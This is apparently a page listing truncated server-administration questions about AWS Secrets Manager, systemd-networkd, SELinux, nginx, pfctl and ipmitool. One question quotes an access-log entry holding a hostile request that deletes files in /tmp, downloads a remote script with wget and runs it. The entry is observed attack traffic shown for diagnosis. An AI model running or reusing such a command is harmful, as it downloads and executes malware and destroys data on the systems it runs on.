Latest Server related questions

An IAM user in our aws account is trying to fetch a particular secret from Secrets Manager via aws cli but they cannot do that although they should have required permissions:

aws secretsmanager get-secret-value --secret-id "config/my/secret"

This fails with error access to kms is not allowed. We use DefaultEncryptionKey for encrypting the secret and the key policy (managed by AWS) looks sensible to me:

i have a server running Ubuntu 20.04 LTS connected through one physical ethernet interface to the internet. My prodiver assigned me a static primary IP4 (i will use A.A.A.A here for this IP), so my systemd-networkd config file looked like this before (disabled netplan to work directly with systemd-networkd):

# /etc/systemd/network/20-enp7s0.network
[Match]
Name=enp7s0

[Network]
LinkLocalAddressing ...

I noticed I am getting some SELinux errors when running mongod for the UniFi controller program. Namely, I am getting:

SELinux is preventing /usr/bin/mongod from search access on the directory /.

SELinux is preventing /usr/bin/mongod from search access on the directory /var/lib/nfs

SELinux is preventing /usr/bin/mongod from search access on the directory fs

SELinux is preventing /usr/bin/mongod  ...

Thanks for taking the time. I have ported a lightsail instance over to EC2 and am running a t.2 larger server. I am running a wordpress site and the homepage is just a blank white page.

I have assigned the ec2 an eleastic IP and can access the wordpress server at this IP 52.27.6.201 But the domain, www.showstream.io is not available. Anyone have any ideas?

I can point the domain at the lightsail in ...

I am see this in my log

"POST /openDoor HTTP/1.1" 301 169 "-" "PostmanRuntime/7.29.0"

"GET /openDoor/ HTTP/1.1" 200 113 "https:///openDoor" "PostmanRuntime/7.29.0"

I am doing a POST to /openDoor and I get a 301. why?

My nginx conf file is this

server {

    client_body_buffer_size 30M;
    client_max_body_size 30M;


    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_pat ...

222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1" 444 0 "-" "Hello, world" "http://127.0.0.1"

167.248.133.47 - - [17/Feb/2022:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\xE3\xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\xE6\xF5\xDB\xE3\x1F\xD5\x5C\xB1 ...

The installation of Courier 1.0.6-1build2 on Ubuntu 20.04 fails, although the courier-package is the one provided by the OS. The problem occurs in a post-installation script which leaves the package installed, but unconfigured and all dependent packages have issues.

The situation has been reported to Ubuntu (see https://bugs.launchpad.net/ubuntu/+source/courier/+bug/1877862), but apart from ›con ...

%HOSTNAME% doesn't get injected inside of all logs that are received. They are coming from the same IP address and most of them get marked. However, some of them just don't get a host name in front of them. In this environment there's no DNS from the interface these logs are coming from. To deal with this, I've inserted the name and IP of the sender into the hosts file of the OS and this works most of t ...

i am trying to close port with basic authentication (for pushgateway of prometheus), so not a big specialist in nginx, so could someone please give me and advice where i am is wrong?

I have 9091 port, that should be closed from outside in front of auth. This port is under use by pushgateway

My current nginx config :

events { }
http {
upstream prometheus {
      server 127.0.0.1:9090;
      keepalive 64;
 ...

I am trying to redirect localhost traffic on specific port to bridged network ip

I am using following

echo "
rdr pass inet proto tcp from any to any port 9300 -> 192.168.64.29 port 9300
rdr pass inet proto tcp from any to any port 3406 -> 192.168.64.29 port 3406
rdr pass inet proto tcp from any to any port 1234 -> 127.0.0.1 port 8000
" | sudo pfctl -ef -

it works fine for 1234 -> 8000

 ...

On servers from most/many vendors, I am able to see potentially sensitive information using commands like:

ipmitool user list 1

or

ipmitool lan print 1

Or set new administrator users, all of which does not require authentication.

This is not necessarily something you would want if you give other users bare metal access. Is there a way to prevent a local host user from accessing/modifying the BMC settin ...

I'm trying to install docker-ce using the debops.docker_server role and can't quite get forward. The default seems to install docker.io which I can't use as I need very recent versions direct from docker inc.

- hosts: docker_nodes
  become: true
  collections: [ 'debops.debops', 'debops.roles01',
                 'debops.roles02', 'debops.roles03' ]

  environment: '{{ inventory__environment | d({} ...